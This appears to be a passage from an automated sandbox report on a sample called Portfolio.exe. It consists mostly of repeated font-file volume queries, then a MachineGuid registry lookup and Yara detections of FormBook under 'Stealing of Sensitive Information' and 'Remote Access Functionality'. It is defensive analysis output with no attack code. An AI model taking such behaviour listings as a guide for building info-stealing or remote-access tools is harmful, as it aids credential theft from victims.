Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Portfolio.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.294841079.0000000001620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.501446234.0000000004E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.294742769.00000000015F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.501316678.0000000004E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.252926038.00000000045D5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.Portfolio.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Portfolio.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.294841079.0000000001620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.501446234.0000000004E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.294742769.00000000015F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, type: MEMORY
